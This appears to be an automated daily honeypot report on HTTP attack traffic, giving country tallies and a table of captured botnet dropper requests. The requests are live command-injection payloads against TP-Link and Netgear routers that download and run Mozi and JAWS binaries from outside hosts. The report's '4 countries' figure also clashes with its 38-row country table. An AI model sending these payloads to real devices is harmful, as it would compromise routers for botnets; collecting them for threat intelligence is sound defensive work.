
Report: 2025-05-16

Author: Shoggoth Industries

Daily Report: 2025-05-16

Executive summary

Interaction report on the HTTP service of various honeypots around the world.

executive_summary

In today’s report, we detected 4 stage 1 IP address(es), linked to 4 dropper URL(s).

There are 258 new requests that have never been observed before (these were added to the monitored request database).

A total of 1328 requests were recorded during the day, originating from 4 different countries, with a peak of 402 requests coming from GB.

ot_simplified_report

Simplified report for medium-level interactions with honeypots that mimic industrial systems (website loading, or interactions with the website). For more, contact us at social@shoggoth.industries.

| source_country | targeted_country |
| --- | --- |
| US | Germany |
| US | Germany |
| US | Germany |
| SG | Germany |
| US | Germany |
| US | Dubai |

botnet_dropper_behaviour

| remote_addr | request |
| --- | --- |
| 141.98.11.137 | GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+r%3B+wget+http%3A%2F%2F212.81.47.226%2Fr%3B+chmod+777+r%3B+.%2Fr+tplink%3B+rm+-rf+r%60) HTTP/1.1 |
| 123.129.130.253 | GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://123.129.130.253:53205/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0 |
| 196.189.10.187 | GET /shell?cd+/tmp;rm+-rf+*;wget+ 45.135.194.174/jaws;sh+/tmp/jaws HTTP/1.1 |
| 175.107.1.188 | GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://175.107.1.188:46194/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0 |

request

The requests listed here are those that have not yet been integrated into the request database.


country_iso_code

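|  | number_of_occurence | country_iso_code |
| --- | --- | --- |
| 0 | 402 | GB |
| 1 | 327 | US |
| 2 | 230 | BG |
| 3 | 86 | PL |
| 4 | 61 | DE |
| 5 | 37 | SC |
| 6 | 27 | NL |
| 7 | 24 | JP |
| 8 | 22 | CN |
| 9 | 15 | CA |
| 10 | 12 | AZ |
| 11 | 7 | RO |
| 12 | 7 | IN |
| 13 | 5 | FR |
| 14 | 5 | HK |
| 15 | 5 | GH |
| 16 | 5 | ZA |
| 17 | 5 | ES |
| 18 | 5 | AO |
| 19 | 4 | IL |
| 20 | 4 | KR |
| 21 | 4 | LT |
| 22 | 3 | IR |
| 23 | 3 | TR |
| 24 | 3 | BR |
| 25 | 3 | SG |
| 26 | 3 | RU |
| 27 | 2 | VN |
| 28 | 2 | AR |
| 29 | 2 | UA |
| 30 | 1 | ET |
| 31 | 1 | PK |
| 32 | 1 | IT |
| 33 | 1 | BE |
| 34 | 1 | HU |
| 35 | 1 | PE |
| 36 | 1 | IQ |
| 37 | 1 | CZ |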
